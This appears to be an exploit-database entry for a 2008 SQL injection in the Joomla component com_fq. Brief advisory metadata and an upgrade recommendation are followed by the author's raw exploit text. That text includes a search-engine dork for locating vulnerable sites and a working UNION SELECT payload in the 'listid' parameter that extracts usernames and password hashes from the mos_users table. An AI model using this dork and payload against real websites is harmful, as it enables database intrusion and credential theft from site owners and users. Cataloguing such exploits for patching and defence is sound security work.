Joomla SQL Injection (com_fq)

vendor:

Joomla

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla SQL Injection (com_fq)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains a malicious SQL query in the 'listid' parameter of the 'index.php' script. This can allow an attacker to gain access to sensitive information from the database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_fq)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_fq"
#
########################################################################
EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                   S@BUN

#########################################################################
#########################################################################
# S@BUN                         GOOD LUCKY                   S@BUN
#########################################################################

# milw0rm.com [2008-01-29]